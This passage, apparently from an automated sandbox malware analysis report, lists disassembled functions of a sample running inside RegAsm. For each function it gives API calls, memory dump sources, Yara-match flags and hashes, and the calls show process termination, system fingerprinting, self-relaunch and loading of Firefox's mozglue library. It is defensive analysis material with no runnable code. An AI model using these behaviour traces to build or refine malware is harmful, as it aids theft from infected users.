                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrcat$File$CloseCreateFind$AllocHandleLocalNextObjectReadSingleSizeSleepThreadWaitlstrcpy
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1847592606-0
                                                                                                                                                                                                                                                    • Opcode ID: 583f826395b8c42f364dbb12656910e4defcf830f51ef111fb98e76dfe398a60
                                                                                                                                                                                                                                                    • Instruction ID: d4e61c7d2469dbfde97b878399e7cefc5a86f05ed22ec7b99aee685cb5fe1f2d
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 583f826395b8c42f364dbb12656910e4defcf830f51ef111fb98e76dfe398a60
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CE41B5B5900218ABDB14EBA0DC86FEE7738BF48700F00459EF605A7190D778A788CFA4
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C720000 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 127threadCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 6C719420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,?,00000000,?,6C70F710,?,00000039,00000000,?,6C72138F,?,?,?), ref: 6C71945E
                                                                                                                                                                                                                                                      • Part of subcall function 6C719420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING,?,?,00000000,?,6C70F710,?,00000039,00000000,?,6C72138F,?,?,?), ref: 6C719470
                                                                                                                                                                                                                                                      • Part of subcall function 6C719420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING,?,?,?,00000000,?,6C70F710,?,00000039,00000000,?,6C72138F,?,?,?), ref: 6C719482
                                                                                                                                                                                                                                                      • Part of subcall function 6C719420: __Init_thread_footer.LIBCMT ref: 6C71949F
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C720039
                                                                                                                                                                                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C720041
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C720075
                                                                                                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(6C75F4B8), ref: 6C720082
                                                                                                                                                                                                                                                    • moz_xmalloc.MOZGLUE(00000048), ref: 6C720090
                                                                                                                                                                                                                                                    • free.MOZGLUE(?), ref: 6C720104
                                                                                                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6C75F4B8), ref: 6C72011B
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    • [D %d/%d] profiler_register_page(%llu, %llu, %s, %llu), xrefs: 6C72005B
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease_getpidfreemoz_xmalloc
                                                                                                                                                                                                                                                    • String ID: [D %d/%d] profiler_register_page(%llu, %llu, %s, %llu)
                                                                                                                                                                                                                                                    • API String ID: 3012294017-637075127
                                                                                                                                                                                                                                                    • Opcode ID: 53c85837e2ec971ec27e019e0d71744c2accceaffec29351e2693e88335db9c6
                                                                                                                                                                                                                                                    • Instruction ID: ad5ec930ac1b3bb457703eac7455a45a09c0ef61675022f902f8c9ec2458959f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 53c85837e2ec971ec27e019e0d71744c2accceaffec29351e2693e88335db9c6
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A241BFB16003449FCB10CF64C944A9ABBF1FF49358F94452EED5A83B50DB31B815CBA5
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C6E7E90 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 116stringCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C6E7EA7
                                                                                                                                                                                                                                                    • malloc.MOZGLUE(00000001), ref: 6C6E7EB3
                                                                                                                                                                                                                                                      • Part of subcall function 6C6ECAB0: EnterCriticalSection.KERNEL32(?), ref: 6C6ECB49
                                                                                                                                                                                                                                                      • Part of subcall function 6C6ECAB0: LeaveCriticalSection.KERNEL32(?), ref: 6C6ECBB6
                                                                                                                                                                                                                                                    • strncpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,00000000), ref: 6C6E7EC4
                                                                                                                                                                                                                                                    • mozalloc_abort.MOZGLUE(?), ref: 6C6E7F19
                                                                                                                                                                                                                                                    • malloc.MOZGLUE(?), ref: 6C6E7F36
                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C6E7F4D
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CriticalSectionmalloc$EnterLeavememcpymozalloc_abortstrlenstrncpy
                                                                                                                                                                                                                                                    • String ID: d
                                                                                                                                                                                                                                                    • API String ID: 204725295-2564639436
                                                                                                                                                                                                                                                    • Opcode ID: 826704e34041b4a4694eb868851ed5a1019f0e94737a53c168ae5f9dfe12b096
                                                                                                                                                                                                                                                    • Instruction ID: 6853b8b547c6dd60f44645ff76a49adb167428c2df5e72c78ce27987e93f9fe2
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 826704e34041b4a4694eb868851ed5a1019f0e94737a53c168ae5f9dfe12b096
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5B31D861E0434897DB019B68CD489FEB778EF96218F44972AEC4997612FB30A688C395
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 004118E0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 105memoryCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00411915
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,000000FA,?,00000000,?,00407426,0040D964), ref: 00411946
                                                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,00407426,0040D964), ref: 0041194D
                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 0041195C
                                                                                                                                                                                                                                                    • OpenProcess.KERNEL32(00001001,00000000), ref: 004119BD
                                                                                                                                                                                                                                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 004119CC
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 004119D3
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Process$Heap$AllocCloseHandleOpenTerminatememsetwsprintf
                                                                                                                                                                                                                                                    • String ID: %hs
                                                                                                                                                                                                                                                    • API String ID: 396451647-2783943728
                                                                                                                                                                                                                                                    • Opcode ID: 1b1b298537e8615da89eb02e101515a9b5f7a736ce16ed7ed7a698d5f4632f13
                                                                                                                                                                                                                                                    • Instruction ID: a9ab091606b9989cac714e5a552ca49587b7bdda62f4a341ea418e64b0062893
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1b1b298537e8615da89eb02e101515a9b5f7a736ce16ed7ed7a698d5f4632f13
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 263180B6900219ABDB10DB94DC85EEFB77DEB09710F10452AFA15A3290D7385E44CBA5
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 00414060 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 88COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0041408E
                                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0041409A
                                                                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,?,00000000), ref: 004140AF
                                                                                                                                                                                                                                                      • Part of subcall function 0040FCD0: lstrcpy.KERNEL32(00000000,004180ED), ref: 0040FCF9
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrlenA.KERNEL32(?,?,?,?,?,?,004214E9,000000FF,?,00418113,?,015C2E10,?), ref: 0040FECC
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrcpy.KERNEL32(00000000), ref: 0040FEF7
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrcat.KERNEL32(?,?), ref: 0040FF01
                                                                                                                                                                                                                                                      • Part of subcall function 0040FDB0: lstrcpy.KERNEL32(00000000), ref: 0040FDF0
                                                                                                                                                                                                                                                    • ShellExecuteEx.SHELL32(0000003C), ref: 00414151
                                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0041415E
                                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00414170
                                                                                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 00414181
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: memset$lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                                                                                                                                                                                                                                    • String ID: <
                                                                                                                                                                                                                                                    • API String ID: 1943017432-4251816714
                                                                                                                                                                                                                                                    • Opcode ID: 6c7e6d6870100d342dba8cbe625f1f0b183ca985fe3232087398b11a3ef270c3
                                                                                                                                                                                                                                                    • Instruction ID: 301d0e976fd4260c5951cc4f96d1137b8d220ab616e3c601254b5500b3555b67
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6c7e6d6870100d342dba8cbe625f1f0b183ca985fe3232087398b11a3ef270c3
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2D3130B1C00248EBDB15EFE5CC85EEEB779AF18304F40457EA20677192DB785A49CB64
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 00410A60 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 48memoryCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • CreateDCA.GDI32(015C2E20,00000000,00000000,00000000), ref: 00410A7A
                                                                                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,00000008), ref: 00410A85
                                                                                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00410A90
                                                                                                                                                                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 00410A9B
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000001,?,?,00415B9A,?,00000000,?,Display Resolution: ,00000000,?,00427274,00000000), ref: 00410AA8
                                                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,?,00000001,?,?,00415B9A,?,00000000,?,Display Resolution: ,00000000,?,00427274,00000000,?), ref: 00410AAF
                                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 00410ABF
                                                                                                                                                                                                                                                      • Part of subcall function 0040FCD0: lstrcpy.KERNEL32(00000000,004180ED), ref: 0040FCF9
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CapsDeviceHeap$AllocCreateProcessReleaselstrcpywsprintf
                                                                                                                                                                                                                                                    • String ID: %dx%d
                                                                                                                                                                                                                                                    • API String ID: 3940144428-2206825331
                                                                                                                                                                                                                                                    • Opcode ID: e77ca127c0ae05486d7882461aaa58ee2cbf3003efc7d7cd8b01be5a6eea0f17
                                                                                                                                                                                                                                                    • Instruction ID: fa186378203a521e5fbd6496835c6dddac4e79f195d4e490bc57bca816cb2ac0
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e77ca127c0ae05486d7882461aaa58ee2cbf3003efc7d7cd8b01be5a6eea0f17
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7E018132740224BBF7102BE9AC0EF5A7A9DFB0AB52F001055FB05E72D0C6B5180047E9
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C6E4C00 Relevance: 13.9, APIs: 8, Strings: 1, Instructions: 421COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(6C75E7DC), ref: 6C6E4C2F
                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(6C75E7DC), ref: 6C6E4C82
                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(6C75E7DC), ref: 6C6E4C89
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CriticalSection$Enter$Leave
                                                                                                                                                                                                                                                    • String ID: MOZ_RELEASE_ASSERT(mNode)
                                                                                                                                                                                                                                                    • API String ID: 2801635615-1351931279
                                                                                                                                                                                                                                                    • Opcode ID: 64a94f9d4d23e53876044024f483abc083a240a4f14031f9fe83d8ae161462f8
                                                                                                                                                                                                                                                    • Instruction ID: 7b60ad63fee97a0aeee8fba7b54696b471eb55597b233deb75290d61b9bc7ef9
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 64a94f9d4d23e53876044024f483abc083a240a4f14031f9fe83d8ae161462f8
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F7F1F47170A6018FD718CF28C554765B7E1EF89728F28C66EE4668BBD4CB70E801CB89
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C6E3E80 Relevance: 13.7, APIs: 9, Instructions: 246memoryCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL ref: 6C6E3EEE
                                                                                                                                                                                                                                                    • RtlFreeHeap.NTDLL(?,00000000,?), ref: 6C6E3FDC
                                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL ref: 6C6E4006
                                                                                                                                                                                                                                                    • RtlFreeHeap.NTDLL(?,00000000,?), ref: 6C6E40A1
                                                                                                                                                                                                                                                    • RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,00000000,?,?,?,?,?,?,6C6E3CCC), ref: 6C6E40AF
                                                                                                                                                                                                                                                    • RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,00000000,?,?,?,?,?,?,6C6E3CCC), ref: 6C6E40C2
                                                                                                                                                                                                                                                    • RtlFreeHeap.NTDLL(?,00000000,00000000), ref: 6C6E4134
                                                                                                                                                                                                                                                    • RtlFreeUnicodeString.NTDLL(?,?,00000000,00000000,?,00000000,00000040,?,?,?,?,?,6C6E3CCC), ref: 6C6E4143
                                                                                                                                                                                                                                                    • RtlFreeUnicodeString.NTDLL(?,?,?,00000000,00000000,?,00000000,00000040,?,?,?,?,?,6C6E3CCC), ref: 6C6E4157
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Free$Heap$StringUnicode$Allocate
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3680524765-0
                                                                                                                                                                                                                                                    • Opcode ID: b13ab191b94d3bc336a0173e00329c51f753acdad4a2e35824d3aa2c58c5bb22
                                                                                                                                                                                                                                                    • Instruction ID: b10e0102f6225aa01b1f08998a667e8c7d7075b6a65e203ecf3f1ecbed753f75
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b13ab191b94d3bc336a0173e00329c51f753acdad4a2e35824d3aa2c58c5bb22
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FDA17FB1A05215CFDB40CF68C880669B7B5BF4C318F2541AAD909AF752D772E886CFA4
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C6D2030 Relevance: 13.7, APIs: 7, Strings: 2, Instructions: 204memoryCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(00000000,?,6C6F3F47,?,?,?,6C6F3F47,6C6F1A70,?), ref: 6C6D207F
                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(?,000000E5,6C6F3F47,?,6C6F3F47,6C6F1A70,?), ref: 6C6D20DD
                                                                                                                                                                                                                                                    • VirtualFree.KERNEL32(00100000,00100000,00004000,?,6C6F3F47,6C6F1A70,?), ref: 6C6D211A
                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(6C75E744,?,6C6F3F47,6C6F1A70,?), ref: 6C6D2145
                                                                                                                                                                                                                                                    • VirtualAlloc.KERNEL32(?,00100000,00001000,00000004,?,6C6F3F47,6C6F1A70,?), ref: 6C6D21BA
                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(6C75E744,?,6C6F3F47,6C6F1A70,?), ref: 6C6D21E0
                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(6C75E744,?,6C6F3F47,6C6F1A70,?), ref: 6C6D2232
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CriticalSection$EnterVirtual$AllocFreeLeavememcpymemset
                                                                                                                                                                                                                                                    • String ID: MOZ_CRASH()$MOZ_RELEASE_ASSERT(node->mArena == this)
                                                                                                                                                                                                                                                    • API String ID: 889484744-884734703
                                                                                                                                                                                                                                                    • Opcode ID: 68b9131cdc78e43551dd2485334469acc62e21f1c5371ec3e3661a55d79e5148
                                                                                                                                                                                                                                                    • Instruction ID: 4eb4a63b5876428c52a0f73a98159f151cfc44195cda3a0a45e68f8b30c93212
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 68b9131cdc78e43551dd2485334469acc62e21f1c5371ec3e3661a55d79e5148
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7961E531F0420A8FCB04CF68CD89B6E77B1AF85318F6A4539E625A7B94DB71AC00C785
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C729D00 Relevance: 13.7, APIs: 9, Instructions: 178timeCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C728273), ref: 6C729D65
                                                                                                                                                                                                                                                    • free.MOZGLUE(6C728273,?), ref: 6C729D7C
                                                                                                                                                                                                                                                    • free.MOZGLUE(?,?), ref: 6C729D92
                                                                                                                                                                                                                                                    • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6C729E0F
                                                                                                                                                                                                                                                    • free.MOZGLUE(6C72946B,?,?), ref: 6C729E24
                                                                                                                                                                                                                                                    • free.MOZGLUE(?,?,?), ref: 6C729E3A
                                                                                                                                                                                                                                                    • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6C729EC8
                                                                                                                                                                                                                                                    • free.MOZGLUE(6C72946B,?,?,?), ref: 6C729EDF
                                                                                                                                                                                                                                                    • free.MOZGLUE(?,?,?,?), ref: 6C729EF5
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
